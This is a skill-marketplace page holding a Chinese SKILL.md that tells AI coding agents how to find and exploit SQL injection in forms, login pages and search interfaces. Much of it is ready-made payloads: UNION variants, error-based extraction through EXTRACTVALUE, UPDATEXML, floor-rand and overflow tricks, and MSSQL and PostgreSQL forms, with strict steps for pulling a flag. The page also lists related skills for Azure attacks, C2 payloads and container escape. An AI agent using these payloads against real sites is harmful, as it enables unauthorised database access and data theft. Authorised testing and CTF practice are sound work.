wgpsec/sql-injection-methodology
skills/exploit/web-method/sql-injection-methodology/SKILL.md
SQL注入检测、利用、绕过的完整方法论。当目标有表单提交、登录页面、搜索功能、数据查询接口时使用。包含POST参数完整性检查、EXTRACTVALUE截断陷阱、UNION/报错/盲注/sqlmap全流程
$ install --global
skillsauthnpx skillsauth add wgpsec/AboutSecurity sql-injection-methodologyInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 24, 2026, 5:54 AM61.7s9 files scanned
SKILL.md
- name:
- sql-injection-methodology
- description:
- SQL注入检测、利用、绕过的完整方法论。当目标有表单提交、登录页面、搜索功能、数据查询接口时使用。包含POST参数完整性检查、EXTRACTVALUE截断陷阱、UNION/报错/盲注/sqlmap全流程
- tags:
- sqli,sql injection,injection,database,bypass,waf,login,search,form,SQL注入,boolean-based,盲注,报错注入
- category:
- exploit
- mitre_attack:
- T1190,T1059
SQL 注入完整方法论
⛔ 深入参考(Phase 3 截断时必读!)
- UNION/报错注入 payload + EXTRACTVALUE 自动提取 Python 脚本 → references/union-and-error.md
- 布尔盲注/时间盲注 + 自动化 Python 脚本 → references/blind-injection.md
- WAF 绕过 + sqlmap → references/waf-bypass-sqlmap.md
- 二次注入/堆叠注入/INSERT-UPDATE/SQLite/INTO OUTFILE → references/advanced-injection.md
- 数据库特定注入技术(MSSQL/Oracle/PostgreSQL/Access) → references/db-specific-injection.md
Phase 0: POST 参数完整性(最先执行!)
- analyze_response 提取所有 input/button 的 name(含 hidden、submit)
- 必须包含 submit 按钮 — PHP 用
isset($_POST['submit'])做验证 - 异常: 注入
'和正常值响应相同 → 缺参数,立即检查
Phase 1: 注入点发现 + 列数确认
- 单引号
'测试 → 有报错即存在注入 - ORDER BY 二分法确定精确列数(⛔ 禁止从 1 逐个递增):
⛔ ORDER BY N 成功 ≠ 列数是 N!必须找到 N+1 失败的边界才能确认ORDER BY 10 → 错误 → ORDER BY 5 → 成功 → ORDER BY 8 → 错误 → ORDER BY 6 → 成功 → ORDER BY 7 → 错误 → 列数 = 6
Phase 2: UNION 注入(首选!必须穷尽 6 种变体后才能放弃)
UNION 无截断限制,一次拿完整 flag。必须按以下顺序尝试所有 6 种变体:
-- ① 标准 UNION(让原查询空)
' AND 1=2 UNION SELECT 1,2,3,4,5,6--
-- ② NULL 代替数字
' AND 1=2 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
-- ③ 不同注释符
' AND 1=2 UNION SELECT 1,2,3,4,5,6#
' AND 1=2 UNION SELECT 1,2,3,4,5,6-- -
-- ④ 大小写/注释绕过
' AND 1=2 UNiON SeLeCT 1,2,3,4,5,6--
-- ⑤ 检查回显位: 响应中出现了哪个数字(2/3/4)?该位置放查询
' AND 1=2 UNION SELECT 1,database(),3,4,5,6--
-- ⑥ 检查完整 HTML 源码(不只是摘要),搜索数字 1-6 是否在隐藏元素中
策略:一旦某个变体成功找到回显位(响应中出现数字),立即用该变体提取数据,无需继续测试剩余变体。全部失败才转 Phase 3。
Phase 3: 报错注入(UNION 失败后使用,截断陷阱!)
报错注入有多种方式,按优先级尝试(某种被过滤就换下一种):
方式 1: EXTRACTVALUE(首选,MySQL 5.1+)
最多返回 32 字符:
' AND EXTRACTVALUE(1,CONCAT(0x7e,database()))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())))--
方式 2: UPDATEXML(EXTRACTVALUE 被过滤时)
' AND UPDATEXML(1,CONCAT(0x7e,database()),1)--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database())),1)--
方式 3: floor+rand(MySQL 经典,兼容性最好)
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(database(),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT flag FROM flag LIMIT 0,1),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
方式 4: exp() 溢出(MySQL 5.5.5-5.5.49)
' AND exp(~(SELECT*FROM(SELECT database())a))--
方式 5: BIGINT 溢出
' AND !(SELECT*FROM(SELECT database())a)-~0--
数据库差异:
- MSSQL:
' AND 1=CONVERT(int,@@version)--或' AND 1=CAST(db_name() AS int)-- - PostgreSQL:
' AND 1=CAST(version() AS int)--
⛔⛔⛔ 提取 flag 值时:禁止手动 SUBSTRING 拼接!必须用脚本!
触发条件: EXTRACTVALUE 返回的 flag 被截断(< 预期长度) 强制动作:
- ⛔ 立即执行 references/union-and-error.md 获取 Python 自动提取脚本
- 用 bash 执行该 Python 脚本(自动分段 + 拼接 + LENGTH 验证)
- ⛔ 绝不手动写 SUBSTRING → 手动拼 hex 必丢字符 → 已连续 2 次导致任务失败
Phase 4: ⛔ Flag 交付前强制验证(无论用了什么注入方式)
在报告 flag 之前,必须全部通过以下检查,否则不得报告:
-- 1. 查询真实长度
' AND EXTRACTVALUE(1,CONCAT(0x7e,LENGTH((SELECT flag FROM flag))))--
| 检查项 | 方法 | 不通过处理 |
|--------|------|-----------|
| 长度匹配 | len(flag) == LENGTH() 返回值 | 重新提取,不得报告 |
| 格式正确 | 以 flag{ 开头 } 结尾 | 重新提取 |
| Hash 合理性 | flag{...} 中 hash 长度通常是 32/40/64 | 长度异常则重新提取 |
⛔ 跳过此验证直接报告 flag = 任务失败。这是最后防线。
POST 参数完整性
- curl 和浏览器差异:浏览器自动发送某些参数,curl 需手动添加
Related Skills
wgpsec/azure-pentesting
testing
VerifiedTrustedCommunity
Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产(Blob Storage/App Service/Azure VM/Azure Functions)、获取 Azure 凭据(Service Principal/Managed Identity/Access Token)、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面
1,393SKILL.mdUpdated Apr 24, 2026
wgpsec/mythic-c2
tools
VerifiedTrustedCommunity
Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务,或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断
1,345SKILL.mdUpdated May 22, 2026
wgpsec/docker-pentesting
development
VerifiedTrustedCommunity
Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能
1,345SKILL.mdUpdated May 22, 2026
wgpsec/padbuster-padding-oracle
development
VerifiedTrustedCommunity
使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文,适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能
1,345SKILL.mdUpdated May 6, 2026